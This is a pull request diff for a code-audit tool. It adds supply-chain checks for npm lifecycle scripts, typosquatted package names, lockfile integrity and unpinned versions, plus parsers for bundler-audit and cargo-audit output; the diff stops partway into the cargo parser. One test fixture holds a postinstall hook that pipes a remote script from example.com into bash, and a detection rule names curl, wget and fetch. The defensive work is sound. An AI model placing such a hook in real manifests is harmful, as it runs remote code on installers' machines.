### PR TITLE
#628: deepen dependencies pack -- supply-chain checks + multi-ecosystem vuln wrappers

### DIFF
--- a/modules/commands-extra/module.json
+++ b/modules/commands-extra/module.json
@@ -458,6 +458,36 @@
       "target": "skills/audit/packs/data-migrations/checks.md",
       "type": "doc",
       "template": false
+    },
+    "skills/audit/scripts/spine/wrap-pip-audit.sh": {
+      "target": "skills/audit/scripts/spine/wrap-pip-audit.sh",
+      "type": "script",
+      "template": false
+    },
+    "skills/audit/scripts/spine/parse-pip-audit.py": {
+      "target": "skills/audit/scripts/spine/parse-pip-audit.py",
+      "type": "script",
+      "template": false
+    },
+    "skills/audit/scripts/spine/wrap-cargo-audit.sh": {
+      "target": "skills/audit/scripts/spine/wrap-cargo-audit.sh",
+      "type": "script",
+      "template": false
+    },
+    "skills/audit/scripts/spine/parse-cargo-audit.py": {
+      "target": "skills/audit/scripts/spine/parse-cargo-audit.py",
+      "type": "script",
+      "template": false
+    },
+    "skills/audit/scripts/spine/wrap-bundler-audit.sh": {
+      "target": "skills/audit/scripts/spine/wrap-bundler-audit.sh",
+      "type": "script",
+      "template": false
+    },
+    "skills/audit/scripts/spine/parse-bundler-audit.py": {
+      "target": "skills/audit/scripts/spine/parse-bundler-audit.py",
+      "type": "script",
+      "template": false
     }
   },
   "tags": [

--- a/modules/commands-extra/skills/audit/packs/dependencies/checks.md
+++ b/modules/commands-extra/skills/audit/packs/dependencies/checks.md
@@ -2,7 +2,7 @@
 
 ## Scope
 
-This pack audits npm dependency health for JavaScript and TypeScript repositories. It covers known CVE vulnerabilities, outdated packages (both minor and major), unused dependencies, and duplicate packages hoisted into the dependency tree. It relies on npm's built-in audit tooling and the knip unused-export analyser. It does NOT audit license compliance (covered by the tos-compliance pack), Python/Go/Rust dependency trees, or indirect peer-dependency conflicts beyond what npm audit reports.
+This pack audits dependency health across multiple ecosystems: npm (JavaScript/TypeScript), pip (Python), Cargo (Rust), and Bundler (Ruby). It covers known CVE vulnerabilities via tool-backed spine wrappers (dep-audit, pip-audit, cargo-audit, bundler-audit), plus supply-chain checks for postinstall lifecycle scripts, typosquatting, lockfile integrity, and unpinned version ranges. It also covers npm-specific outdatedness and dead-code cleanup (knip). It does NOT audit license compliance (covered by the tos-compliance pack), Go dependency trees (covered by govulncheck in the security pack), peer-dependency conflicts beyond what npm audit reports, or Python/Ruby/Rust outdatedness (those ecosystems lack a tool-backed auditor in this wave).
 
 **Pack ID:** `ccgm/dependencies`
 **Applies when:** `language:javascript`
@@ -13,7 +13,7 @@ This pack audits npm dependency health for JavaScript and TypeScript repositorie
 
 | Condition | Reason |
 |-----------|--------|
-| `language:javascript` | The ecosystem detector emits the `javascript` ecosystem for any repository that has a `package.json`; TypeScript repos additionally emit `typescript`. The registry derives condition tokens as `language:javascript` and `language:typescript` respectively. All checks target npm's package.json ecosystem; the dep-audit and knip spine tools require a package.json to function. Using `language:javascript` is the broadest honest gate: it covers both plain-JS and TypeScript projects (TS repos with a `package.json` satisfy both ecosystems). Wave 4.1 will broaden coverage to Python (pip-audit) and Go (govulncheck) under separate packs. |
+| `language:javascript` | The ecosystem detector emits the `javascript` ecosystem for any repository that has a `package.json`; TypeScript repos additionally emit `typescript`. The registry derives condition tokens as `language:javascript` and `language:typescript` respectively. All LLM and knip checks target npm's package.json ecosystem; the dep-audit spine tool requires a package.json to function. Using `language:javascript` is the broadest honest gate: it covers both plain-JS and TypeScript projects. Wave 4.1 extends vulnerability coverage to Python (pip-audit), Rust (cargo-audit), and Ruby (bundler-audit) as additional spine tools — their wrappers run when the relevant manifest is present regardless of the pack gate, but the pack's LLM and grep checks remain npm-scoped. |
 
 ---
 
@@ -55,6 +55,11 @@ findings with `check_id: deps/vulnerable-dependency` (rubric entry: high severit
 high fix_confidence). The LLM worker triages these spine candidates via `spine_triage`.
 The check-id `dependencies/npm-audit-vulnerability` is the pack's semantic label for this
 audit category. The spine emits `deps/vulnerable-dependency`, not `dependencies/npm-audit-vulnerability`.
+
+**Multi-ecosystem note:** `pip-audit`, `cargo-audit`, and `bundler-audit` also emit
+`deps/vulnerable-dependency` findings. When any of these tools is absent the wrapper emits a
+`coverage_gap` note with `tool: pip-audit` / `cargo-audit` / `bundler-audit`. The LLM worker
+should treat such gaps as a recommendation to install the missing tool rather than a false negative.
 
 #### Severity / Confidence
 
@@ -403,6 +408,380 @@ detection: llm
 
 ---
 
+### `dependencies/postinstall-script`
+
+**Severity:** `high`
+**Confidence:** `medium`
+**Detection:** `hybrid`
+
+#### Detection
+
+**Tool (if detection = tool or hybrid):**
+n/a — grep-based detection in the hybrid path; no dedicated spine tool
+
+Fallback when tool absent: `llm`
+
+**LLM instruction (if detection = llm or hybrid):**
+
+```
+READ AND APPLY: ~/.claude/skills/audit/reference/fix-patterns.md
+Consult the Fix Type Reference table and confidence levels from that file when classifying
+each finding's fix_type and fix_confidence. Do not rely on memory — open and apply the file.
+
+Scan the repository for lifecycle scripts that run arbitrary code during package installation.
+
+Step 1 — Project-level scripts:
+  Read package.json (and workspace package.json files if this is a monorepo).
+  Flag any of: "preinstall", "postinstall", "install", "preuninstall", "postuninstall"
+  keys in the "scripts" object. These execute during npm install / npm uninstall for anyone
+  who installs this package, and are a common supply-chain attack vector.
+
+Step 2 — Third-party dependency scripts:
+  Grep for '"postinstall"', '"preinstall"', '"install"' keys in files matching
+  node_modules/*/package.json. For each hit, record the package name and script value.
+  Flag packages whose script invokes a network call (curl, wget, fetch, https://),
+  spawns a shell with untrusted input, or runs a compiled binary from an unusual path.
+
+For each finding:
+  - path: the package.json file containing the lifecycle script
+  - message: the package name, script key, and first 80 chars of the script value
+  - auto_fixable: false (removal requires verifying the script's purpose)
+
+Do NOT flag:
+  - Scripts that only invoke standard build tools (node, tsc, esbuild, rollup, webpack,
+    babel, rimraf) with static arguments
+  - Scripts from well-known, widely-audited packages (e.g. esbuild, turbo, node-gyp
+    when building native extensions explicitly listed in the project's purpose)
+  - husky or other developer-only lifecycle hooks that are clearly dev-only
+```
+
+#### Spine Wiring
+
+```yaml
+check_id: dependencies/postinstall-script
+detection: hybrid
+fallback: llm
+```
+
+No dedicated spine tool — grep pattern matching + LLM triage for the hybrid path.
+
+#### Severity / Confidence
+
+**Severity rationale:** Postinstall scripts are a documented vector for npm supply-chain attacks (malicious packages executing code during `npm install`). HIGH severity because an exploited postinstall runs in the developer's environment with full shell access. A finding warrants manual review even when the script appears benign.
+
+**Confidence rationale:** Detection is syntactic (presence of lifecycle script key) rather than semantic (analysis of what the script does). Whether the script is malicious requires human judgment; many legitimate packages use postinstall for native compilation. MEDIUM confidence because syntactic presence is reliable but impact assessment is not.
+
+**Rubric entry:** `dependencies/postinstall-script`
+
+#### Fixture
+
+**True positive** (`package.json` with suspicious postinstall):
+
+```json
+{
+  "name": "my-app",
+  "scripts": {
+    "postinstall": "curl https://example.com/setup.sh | bash"
+  }
+}
+```
+*(Postinstall fetches and executes remote code — finding reported)*
+
+**True negative** (should produce NO finding):
+
+```json
+{
+  "name": "my-app",
+  "scripts": {
+    "build": "tsc --project tsconfig.json",
+    "test": "jest"
+  }
+}
+```
+*(No lifecycle installation scripts — no finding)*
+
+---
+
+### `dependencies/typosquat`
+
+**Severity:** `high`
+**Confidence:** `low`
+**Detection:** `llm`
+
+#### Detection
+
+**LLM instruction (if detection = llm or hybrid):**
+
+```
+READ AND APPLY: ~/.claude/skills/audit/reference/fix-patterns.md
+Consult the Fix Type Reference table and confidence levels from that file when classifying
+each finding's fix_type and fix_confidence. Do not rely on memory — open and apply the file.
+
+Scan the project's dependency manifests for package names that are suspiciously similar to
+well-known, popular packages — a classic typosquatting vector.
+
+Step 1 — Collect all dependency names:
+  Read package.json (dependencies, devDependencies, peerDependencies, optionalDependencies).
+  If a requirements.txt or Gemfile is present, also collect their dependency names.
+
+Step 2 — Check each name against known typosquatting patterns:
+  Flag a dependency name if it:
+    (a) Is one character away (addition, deletion, substitution, transposition) from a
+        well-known package (e.g. "lodahs" for "lodash", "recat" for "react",
+        "expresss" for "express", "axois" for "axios", "momentjs" for "moment",
+        "babbel" for "babel", "typescirpt" for "typescript").
+    (b) Replaces a hyphen with nothing or a number (e.g. "crossenv" for "cross-env",
+        "dotenv2" for "dotenv").
+    (c) Prepends or appends common confusing words ("node-", "the-", "-js", "-official")
+        to a well-known package name where those affixes are NOT part of the canonical name.
+    (d) Swaps a namespace prefix (e.g. "@babel/core" vs "babel-core" in contexts where
+        the namespaced version is the canonical one).
+
+For each suspicious dependency:
+  - path: the manifest file (package.json, requirements.txt, Gemfile)
+  - message: the suspicious name, the well-known name it resembles, and the edit distance
+  - auto_fixable: false (requires verifying intent and potentially updating imports)
+
+Do NOT flag:
+  - Packages that are genuinely distinct from their lookalikes in a well-documented way
+  - Packages that are explicitly scoped aliases ("lodash-es", "lodash-fp", "date-fns/esm")
+    where the affix is part of the package's published purpose
+  - Packages you cannot confidently associate with a popular counterpart
+    (prefer false negatives over false positives for this check)
+```
+
+#### Spine Wiring
+
+```yaml
+check_id: dependencies/typosquat
+detection: llm
+```
+
+No tool — LLM-only check. The LLM reasons about edit distance and naming conventions.
+
+#### Severity / Confidence
+
+**Severity rationale:** Typosquatted packages can install malware, steal credentials, or exfiltrate environment variables on any machine running `npm install` or `pip install`. HIGH severity because the impact of an exploited typosquat ranges from data exfiltration to full system compromise.
+
+**Confidence rationale:** LLM-based edit-distance reasoning is inherently imprecise — the set of "popular packages" is not exhaustive, and many legitimate packages have names that are one character from a popular one. LOW confidence because false positives are frequent; this check is a screening aid, not a definitive detector. Findings require human confirmation.
+
+**Rubric entry:** `dependencies/typosquat`
+
+#### Fixture
+
+**True positive** (`package.json` with typosquatted dep):
+
+```json
+{
+  "dependencies": {
+    "lodahs": "4.17.21"
+  }
+}
+```
+*(One-character transposition of "lodash" — suspicious name)*
+
+**True negative** (should produce NO finding):
+
+```json
+{
+  "dependencies": {
+    "lodash": "4.17.21",
+    "lodash-es": "4.17.21"
+  }
+}
+```
+*("lodash-es" is the canonical ESM build of lodash, not a typosquat)*
+
+---
+
+### `dependencies/lockfile-integrity`
+
+**Severity:** `high`
+**Confidence:** `medium`
+**Detection:** `hybrid`
+
+#### Detection
+
+**Tool (if detection = tool or hybrid):**
+n/a — grep-based detection; no dedicated spine tool
+
+Fallback when tool absent: `llm`
+
+**LLM instruction (if detection = llm or hybrid):**
+
+```
+READ AND APPLY: ~/.claude/skills/audit/reference/fix-patterns.md
+Consult the Fix Type Reference table and confidence levels from that file when classifying
+each finding's fix_type and fix_confidence. Do not rely on memory — open and apply the file.
+
+Check the repository's dependency lockfile for integrity issues.
+
+Check 1 — Lockfile missing:
+  If package.json exists but NO lockfile (package-lock.json, yarn.lock, pnpm-lock.yaml,
+  bun.lockb, Pipfile.lock, poetry.lock, Cargo.lock, Gemfile.lock) is present in the same
+  directory, report a missing lockfile. A missing lockfile means installs are non-deterministic
+  and dependency versions are not pinned.
+
+Check 2 — Lockfile out of sync:
+  If package.json and package-lock.json (or yarn.lock / pnpm-lock.yaml) both exist,
+  check for signs of divergence:
+    (a) A dependency listed in package.json that has NO entry in the lockfile.
+    (b) A dependency in the lockfile at a version OUTSIDE the semver range declared in
+        package.json (e.g. lockfile pins 5.0.0 but package.json requires "^6.0.0").
+  Both conditions indicate the lockfile was not regenerated after editing package.json.
+
+For each finding:
+  - path: package.json (for missing lockfile) or the lockfile path (for sync issues)
+  - message: which manifest, what is missing or diverged, and the fix command
+  - auto_fixable: false (regenerating a lockfile can change resolved versions)
+
+Do NOT flag:
+  - Repositories that intentionally omit a lockfile (e.g. published libraries where
+    package.json specifies only peer dependency ranges and no lockfile is conventional)
+  - Monorepo workspaces that share a single root-level lockfile
+```
+
+#### Spine Wiring
+
+```yaml
+check_id: dependencies/lockfile-integrity
+detection: hybrid
+fallback: llm
+```
+
+No dedicated spine tool — the hybrid path uses file-existence checks + LLM comparison.
+
+#### Severity / Confidence
+
+**Severity rationale:** A missing or out-of-sync lockfile means CI and developer machines can install different package versions, making the build non-reproducible and potentially allowing a malicious package version to be resolved at install time. HIGH severity because reproducibility failures directly enable supply-chain drift.
+
+**Confidence rationale:** Lockfile presence is a deterministic check. Sync divergence requires comparing version ranges across two files, which the LLM can perform with moderate accuracy; subtle range edge cases may be missed. MEDIUM confidence.
+
+**Rubric entry:** `dependencies/lockfile-integrity`
+
+#### Fixture
+
+**True positive** (package.json present, no lockfile):
+
+```
+package.json      ← exists
+(no package-lock.json, yarn.lock, pnpm-lock.yaml)
+```
+*(Lockfile absent — non-deterministic installs)*
+
+**True negative** (should produce NO finding):
+
+```
+package.json          ← exists
+package-lock.json     ← exists, versions in sync
+```
+*(Both files present and in sync — no finding)*
+
+---
+
+### `dependencies/unpinned-version-range`
+
+**Severity:** `medium`
+**Confidence:** `high`
+**Detection:** `hybrid`
+
+#### Detection
+
+**Tool (if detection = tool or hybrid):**
+n/a — grep-based detection; no dedicated spine tool
+
+Fallback when tool absent: `llm`
+
+**LLM instruction (if detection = llm or hybrid):**
+
+```
+READ AND APPLY: ~/.claude/skills/audit/reference/fix-patterns.md
+Consult the Fix Type Reference table and confidence levels from that file when classifying
+each finding's fix_type and fix_confidence. Do not rely on memory — open and apply the file.
+
+Scan dependency manifests for version specifiers that allow a range of versions to be
+resolved at install time. Focus on production dependencies of sensitive packages.
+
+Step 1 — Collect manifests:
+  Read: package.json (dependencies, devDependencies, peerDependencies),
+        requirements.txt or pyproject.toml (Python),
+        Gemfile (Ruby — look for gem directives without a `:require => false` or version pin).
+
+Step 2 — Flag unpinned specifiers in sensitive contexts:
+  Flag a dependency entry if:
+    (a) package.json: dependency uses ^, ~, >=, >, *, or "latest" as the version specifier,
+        AND the package is a production dependency (not devDependencies) that handles
+        authentication, cryptography, HTTP requests, database access, or serialization.
+        Examples of sensitive categories: axios, got, node-fetch, bcrypt, jsonwebtoken,
+        passport, sequelize, mongoose, pg, prisma, multer, formidable, serialize-javascript.
+    (b) requirements.txt: dependency uses >= or no version pin at all (bare package name),
+        AND the package is a network, crypto, or serialization library (requests, pycryptodome,
+        cryptography, paramiko, sqlalchemy, flask, django).
+    (c) Gemfile: dependency uses no version constraint or only a ~> (pessimistic) constraint
+        that allows minor-or-patch upgrades on a cryptography or network gem (openssl, net-http,
+        faraday, httparty, rack, rails).
+
+  Do NOT flag:
+    - devDependencies with caret ranges (standard and acceptable for build tooling)
+    - Packages that are clearly not security-sensitive (date formatters, UI utilities, test helpers)
+    - peerDependencies (ranges are the norm for peer deps)
+    - Version specifiers that are already exact (e.g. "1.2.3", "==1.2.3", "= 1.2.3")
+    - Internal workspace packages ("workspace:*" or "file:../")
+
+For each finding:
+  - path: the manifest file
+  - message: the package name, the current specifier, and why the range is sensitive
+  - auto_fixable: false — pinning requires running the install and committing the exact version
+```
+
+#### Spine Wiring
+
+```yaml
+check_id: dependencies/unpinned-version-range
+detection: hybrid
+fallback: llm
+```
+
+No dedicated spine tool — grep for `^`, `~`, `>=`, `*` in manifest files + LLM triage for sensitivity.
+
+#### Severity / Confidence
+
+**Severity rationale:** Unpinned ranges on security-sensitive packages allow a compromised patch release to be silently pulled in on the next `npm install` or `pip install`. MEDIUM severity because the risk materializes only if the upstream package is itself compromised; for most projects the likelihood is low but the impact is high.
+
+**Confidence rationale:** Detecting range syntax in a manifest is deterministic and reliable — the grep or LLM can read the version string exactly. Determining whether a package is "sensitive" requires LLM judgment, which is imperfect but generally accurate for well-known ecosystem packages. HIGH confidence overall.
+
+**Rubric entry:** `dependencies/unpinned-version-range`
+
+#### Fixture
+
+**True positive** (`package.json` with unpinned production dep):
+
+```json
+{
+  "dependencies": {
+    "jsonwebtoken": "^9.0.0",
+    "axios": "*"
+  }
+}
+```
+*(jsonwebtoken with caret range and axios with wildcard — both security-sensitive, both unpinned)*
+
+**True negative** (should produce NO finding):
+
+```json
+{
+  "dependencies": {
+    "jsonwebtoken": "9.0.2"
+  },
+  "devDependencies": {
+    "jest": "^29.0.0"
+  }
+}
+```
+*(jsonwebtoken is exactly pinned; jest caret range is devDependency — no finding)*
+
+---
+
 ## Migration Mapping
 
 Every bullet from the original Agent 2 Dependencies Audit category prompt is mapped to its owning check-id:
@@ -415,7 +794,22 @@ Every bullet from the original Agent 2 Dependencies Audit category prompt is map
 | Unused dependencies (auto-fixable: npm uninstall) | `dependencies/unused-dependency` |
 | Duplicate dependencies (NOT auto-fixable - needs investigation) | `dependencies/duplicate-dependency` |
 
-All 5 original bullets are covered. No bullet dropped. The original `Run: npm audit --json, npm outdated --json` instruction is preserved in the individual check LLM instructions.
+Wave 4.1 additions:
+
+| New check | Motivation |
+|-----------|-----------|
+| `dependencies/postinstall-script` | Supply-chain: lifecycle scripts that execute arbitrary code at install time |
+| `dependencies/typosquat` | Supply-chain: package names one edit away from popular packages |
+| `dependencies/lockfile-integrity` | Supply-chain: missing or out-of-sync lockfile allows non-deterministic installs |
+| `dependencies/unpinned-version-range` | Supply-chain: caret/tilde/wildcard ranges on security-sensitive production deps |
+
+Multi-ecosystem vulnerability coverage (Wave 4.1) via new spine tools:
+
+| Ecosystem | Tool | Spine check-id | Absent-tool behavior |
+|-----------|------|----------------|----------------------|
+| Python | pip-audit | `deps/vulnerable-dependency` | `coverage_gap` + LLM fallback note |
+| Rust | cargo-audit | `deps/vulnerable-dependency` | `coverage_gap` + LLM fallback note |
+| Ruby | bundler-audit | `deps/vulnerable-dependency` | `coverage_gap` + LLM fallback note |
 
 ---
 

--- a/modules/commands-extra/skills/audit/packs/dependencies/checks.md
+++ b/modules/commands-extra/skills/audit/packs/dependencies/checks.md
@@ -412,16 +412,11 @@ detection: llm
 
 **Severity:** `high`
 **Confidence:** `medium`
-**Detection:** `hybrid`
+**Detection:** `llm`
 
 #### Detection
 
-**Tool (if detection = tool or hybrid):**
-n/a — grep-based detection in the hybrid path; no dedicated spine tool
-
-Fallback when tool absent: `llm`
-
-**LLM instruction (if detection = llm or hybrid):**
+**LLM instruction:**
 
 ```
 READ AND APPLY: ~/.claude/skills/audit/reference/fix-patterns.md
@@ -459,11 +454,10 @@ Do NOT flag:
 
 ```yaml
 check_id: dependencies/postinstall-script
-detection: hybrid
-fallback: llm
+detection: llm
 ```
 
-No dedicated spine tool — grep pattern matching + LLM triage for the hybrid path.
+No dedicated spine tool — worker-run grep + LLM triage.
 
 #### Severity / Confidence
 
@@ -598,16 +592,11 @@ No tool — LLM-only check. The LLM reasons about edit distance and naming conve
 
 **Severity:** `high`
 **Confidence:** `medium`
-**Detection:** `hybrid`
+**Detection:** `llm`
 
 #### Detection
 
-**Tool (if detection = tool or hybrid):**
-n/a — grep-based detection; no dedicated spine tool
-
-Fallback when tool absent: `llm`
-
-**LLM instruction (if detection = llm or hybrid):**
+**LLM instruction:**
 
 ```
 READ AND APPLY: ~/.claude/skills/audit/reference/fix-patterns.md
@@ -645,11 +634,10 @@ Do NOT flag:
 
 ```yaml
 check_id: dependencies/lockfile-integrity
-detection: hybrid
-fallback: llm
+detection: llm
 ```
 
-No dedicated spine tool — the hybrid path uses file-existence checks + LLM comparison.
+No dedicated spine tool — worker-run file-existence checks + LLM comparison.
 
 #### Severity / Confidence
 
@@ -683,16 +671,11 @@ package-lock.json     ← exists, versions in sync
 
 **Severity:** `medium`
 **Confidence:** `high`
-**Detection:** `hybrid`
+**Detection:** `llm`
 
 #### Detection
 
-**Tool (if detection = tool or hybrid):**
-n/a — grep-based detection; no dedicated spine tool
-
-Fallback when tool absent: `llm`
-
-**LLM instruction (if detection = llm or hybrid):**
+**LLM instruction:**
 
 ```
 READ AND APPLY: ~/.claude/skills/audit/reference/fix-patterns.md
@@ -738,11 +721,10 @@ For each finding:
 
 ```yaml
 check_id: dependencies/unpinned-version-range
-detection: hybrid
-fallback: llm
+detection: llm
 ```
 
-No dedicated spine tool — grep for `^`, `~`, `>=`, `*` in manifest files + LLM triage for sensitivity.
+No dedicated spine tool — worker-run grep for `^`, `~`, `>=`, `*` in manifest files + LLM triage for sensitivity.
 
 #### Severity / Confidence
 

--- a/modules/commands-extra/skills/audit/packs/dependencies/pack.json
+++ b/modules/commands-extra/skills/audit/packs/dependencies/pack.json
@@ -1,11 +1,11 @@
 {
   "id": "ccgm/dependencies",
   "name": "Dependencies Audit",
-  "version": "1.0.0",
+  "version": "1.1.0",
   "applies_when": ["language:javascript"],
-  "tags": ["dependencies", "npm", "vulnerabilities", "supply-chain"],
+  "tags": ["dependencies", "npm", "pip", "cargo", "bundler", "vulnerabilities", "supply-chain"],
   "severity_floor": "low",
-  "tools": ["dep-audit", "knip"],
+  "tools": ["dep-audit", "knip", "pip-audit", "cargo-audit", "bundler-audit"],
   "checks": [
     {
       "id": "dependencies/npm-audit-vulnerability",
@@ -43,6 +43,37 @@
       "severity": "medium",
       "confidence": "high",
       "detection": "llm",
+      "auto_fixable": false
+    },
+    {
+      "id": "dependencies/postinstall-script",
+      "severity": "high",
+      "confidence": "medium",
+      "detection": "hybrid",
+      "fallback": "llm",
+      "auto_fixable": false
+    },
+    {
+      "id": "dependencies/typosquat",
+      "severity": "high",
+      "confidence": "low",
+      "detection": "llm",
+      "auto_fixable": false
+    },
+    {
+      "id": "dependencies/lockfile-integrity",
+      "severity": "high",
+      "confidence": "medium",
+      "detection": "hybrid",
+      "fallback": "llm",
+      "auto_fixable": false
+    },
+    {
+      "id": "dependencies/unpinned-version-range",
+      "severity": "medium",
+      "confidence": "high",
+      "detection": "hybrid",
+      "fallback": "llm",
       "auto_fixable": false
     }
   ]

--- a/modules/commands-extra/skills/audit/packs/dependencies/pack.json
+++ b/modules/commands-extra/skills/audit/packs/dependencies/pack.json
@@ -49,8 +49,7 @@
       "id": "dependencies/postinstall-script",
       "severity": "high",
       "confidence": "medium",
-      "detection": "hybrid",
-      "fallback": "llm",
+      "detection": "llm",
       "auto_fixable": false
     },
     {
@@ -64,16 +63,14 @@
       "id": "dependencies/lockfile-integrity",
       "severity": "high",
       "confidence": "medium",
-      "detection": "hybrid",
-      "fallback": "llm",
+      "detection": "llm",
       "auto_fixable": false
     },
     {
       "id": "dependencies/unpinned-version-range",
       "severity": "medium",
       "confidence": "high",
-      "detection": "hybrid",
-      "fallback": "llm",
+      "detection": "llm",
       "auto_fixable": false
     }
   ]

--- a/modules/commands-extra/skills/audit/schemas/severity-rubric.json
+++ b/modules/commands-extra/skills/audit/schemas/severity-rubric.json
@@ -70,6 +70,26 @@
       "confidence": "high",
       "fix_confidence": "low"
     },
+    "dependencies/postinstall-script": {
+      "severity": "high",
+      "confidence": "medium",
+      "fix_confidence": "low"
+    },
+    "dependencies/typosquat": {
+      "severity": "high",
+      "confidence": "low",
+      "fix_confidence": "low"
+    },
+    "dependencies/lockfile-integrity": {
+      "severity": "high",
+      "confidence": "medium",
+      "fix_confidence": "low"
+    },
+    "dependencies/unpinned-version-range": {
+      "severity": "medium",
+      "confidence": "high",
+      "fix_confidence": "low"
+    },
     "code-quality/eslint-violation": {
       "severity": "medium",
       "confidence": "high",

--- a/modules/commands-extra/skills/audit/scripts/spine/parse-bundler-audit.py
+++ b/modules/commands-extra/skills/audit/scripts/spine/parse-bundler-audit.py
@@ -1,0 +1,253 @@
+#!/usr/bin/env python3
+"""
+CCGM audit spine -- parse bundler-audit output -> finding.schema.json JSONL.
+
+Usage: parse-bundler-audit.py <bundler_audit_output_file>
+
+bundler-audit supports two output formats:
+
+1. JSON format (bundler-audit >= 0.9, --format json):
+   {
+     "version": "0.9.2",
+     "created_at": "2024-01-01T00:00:00Z",
+     "results": [
+       {
+         "type": "InsecureSource",
+         "source": { "uri": "http://insecure.example" }
+       },
+       {
+         "type": "UnpatchedGem",
+         "gem": {
+           "name": "activesupport",
+           "version": "5.2.0"
+         },
+         "advisory": {
+           "id": "CVE-2023-12345",
+           "ghsa": "GHSA-xxxx-xxxx-xxxx",
+           "title": "Possible ReDoS vulnerability...",
+           "date": "2023-01-15",
+           "url": "https://github.com/advisories/GHSA-xxxx-xxxx-xxxx",
+           "description": "...",
+           "cvss_v2": 5.0,
+           "cvss_v3": 7.5,
+           "cve": "2023-12345",
+           "osvdb": null,
+           "criticality": "high",
+           "patched_versions": [">= 6.1.7.3", ">= 7.0.4.3"],
+           "unaffected_versions": []
+         }
+       }
+     ],
+     "ignored": [],
+     "totals": {
+       "unpatched": 1,
+       "ignored": 0
+     }
+   }
+
+2. Text format (bundler-audit < 0.9, default output):
+   Name: activesupport
+   Version: 5.2.0
+   Advisory: CVE-2023-12345
+   Criticality: High
+   URL: https://github.com/advisories/GHSA-xxxx-xxxx-xxxx
+   Title: Possible ReDoS vulnerability in GlobalID
+   Solution: upgrade to >= 6.1.7.3, >= 7.0.4.3
+
+   Vulnerabilities found!
+
+The parser tries JSON first; on failure, falls back to line-based text parsing.
+"""
+
+import json
+import os
+import re
+import sys
+
+sys.path.insert(0, os.path.dirname(__file__))
+import normalize  # noqa: E402
+
+
+_SEVERITY_MAP = {
+    "critical": "critical",
+    "high": "high",
+    "medium": "medium",
+    "moderate": "medium",
+    "low": "low",
+    "none": "low",
+    "unknown": "medium",
+}
+
+
+def map_severity(raw):
+    if isinstance(raw, str):
+        return _SEVERITY_MAP.get(raw.lower(), "high")
+    return "high"
+
+
+def map_severity_from_cvss(cvss_v3, cvss_v2):
+    """Derive severity from CVSS score when criticality field is absent."""
+    score = cvss_v3 if cvss_v3 is not None else cvss_v2
+    if score is None:
+        return "high"
+    if score >= 9.0:
+        return "critical"
+    if score >= 7.0:
+        return "high"
+    if score >= 4.0:
+        return "medium"
+    return "low"
+
+
+def process_json(data):
+    """Parse bundler-audit JSON format."""
+    results = data.get("results", [])
+    if not isinstance(results, list):
+        return
+
+    for item in results:
+        if not isinstance(item, dict):
+            continue
+        if item.get("type") != "UnpatchedGem":
+            continue
+
+        gem = item.get("gem", {}) or {}
+        advisory = item.get("advisory", {}) or {}
+
+        pkg_name = gem.get("name", "unknown")
+        pkg_version = gem.get("version", "")
+        vuln_id = advisory.get("id") or advisory.get("cve", "unknown")
+        title = advisory.get("title", "Vulnerable gem")
+        url = advisory.get("url", "")
+        criticality = advisory.get("criticality", "")
+        cvss_v3 = advisory.get("cvss_v3")
+        cvss_v2 = advisory.get("cvss_v2")
+
+        if criticality:
+            severity = map_severity(criticality)
+        else:
+            severity = map_severity_from_cvss(cvss_v3, cvss_v2)
+
+        message = "{0} in {1} {2}".format(title, pkg_name, pkg_version).strip()
+        if url:
+            message = "{0} -- {1}".format(message, url)
+
+        # Prefix vuln_id with CVE- if it looks like a bare CVE number
+        if re.fullmatch(r"\d{4}-\d+", vuln_id):
+            vuln_id = "CVE-{0}".format(vuln_id)
+
+        fp = normalize.make_content_fingerprint(
+            "{0}:{1}:{2}".format(vuln_id, pkg_name, pkg_version)
+        )
+
+        finding = normalize.make_finding(
+            check_id="deps/vulnerable-dependency",
+            rule_id=vuln_id,
+            severity=severity,
+            confidence="high",
+            path="Gemfile.lock",
+            line=1,
+            message=message,
+            fingerprint=fp,
+            properties={
+                "tool": "bundler-audit",
+                "package": pkg_name,
+                "ecosystem": "ruby",
+            },
+        )
+        normalize.emit_finding(finding)
+
+
+def process_text(text):
+    """Parse bundler-audit text format (line-based key: value blocks)."""
+    current = {}
+    for line in text.splitlines():
+        line = line.rstrip()
+        if not line:
+            if current:
+                emit_text_finding(current)
+                current = {}
+            continue
+        if ":" in line:
+            key, _, value = line.partition(":")
+            current[key.strip().lower()] = value.strip()
+
+    if current:
+        emit_text_finding(current)
+
+
+def emit_text_finding(rec):
+    """Emit a single finding from a key:value block parsed from text output."""
+    name = rec.get("name", "")
+    if not name:
+        return  # Not a vulnerability block
+
+    version = rec.get("version", "")
+    advisory_id = rec.get("advisory", rec.get("cve", "unknown"))
+    criticality = rec.get("criticality", "")
+    title = rec.get("title", "Vulnerable gem")
+    url = rec.get("url", "")
+
+    severity = map_severity(criticality) if criticality else "high"
+
+    message = "{0} in {1} {2}".format(title, name, version).strip()
+    if url:
+        message = "{0} -- {1}".format(message, url)
+
+    if re.fullmatch(r"\d{4}-\d+", advisory_id):
+        advisory_id = "CVE-{0}".format(advisory_id)
+
+    fp = normalize.make_content_fingerprint(
+        "{0}:{1}:{2}".format(advisory_id, name, version)
+    )
+
+    finding = normalize.make_finding(
+        check_id="deps/vulnerable-dependency",
+        rule_id=advisory_id,
+        severity=severity,
+        confidence="high",
+        path="Gemfile.lock",
+        line=1,
+        message=message,
+        fingerprint=fp,
+        properties={
+            "tool": "bundler-audit",
+            "package": name,
+            "ecosystem": "ruby",
+        },
+    )
+    normalize.emit_finding(finding)
+
+
+def main(argv):
+    if len(argv) < 2:
+        sys.stderr.write("Usage: parse-bundler-audit.py <output_file>\n")
+        sys.exit(1)
+
+    output_file = argv[1]
+
+    try:
+        with open(output_file, "r", encoding="utf-8") as fh:
+            raw = fh.read().strip()
+    except OSError as exc:
+        sys.stderr.write("Cannot read {0}: {1}\n".format(output_file, exc))
+        sys.exit(0)
+
+    if not raw:
+        return
+
+    # Try JSON first
+    try:
+        data = json.loads(raw)
+        if isinstance(data, dict) and "results" in data:
+            process_json(data)
+            return
+    except json.JSONDecodeError:
+        pass
+
+    # Fall back to text format
+    process_text(raw)
+
+
+if __name__ == "__main__":
+    main(sys.argv)

--- a/modules/commands-extra/skills/audit/scripts/spine/parse-cargo-audit.py
+++ b/modules/commands-extra/skills/audit/scripts/spine/parse-cargo-audit.py
@@ -1,0 +1,171 @@
+#!/usr/bin/env python3
+"""
+CCGM audit spine -- parse cargo-audit JSON output -> finding.schema.json JSONL.
+
+Usage: parse-cargo-audit.py <cargo_audit_json_file>
+
+cargo audit --json emits a single JSON object.
+
+Assumed output shape (cargo-audit >= 0.17, rustsec advisory DB):
+  {
+    "database": { "advisory-count": 123, ... },
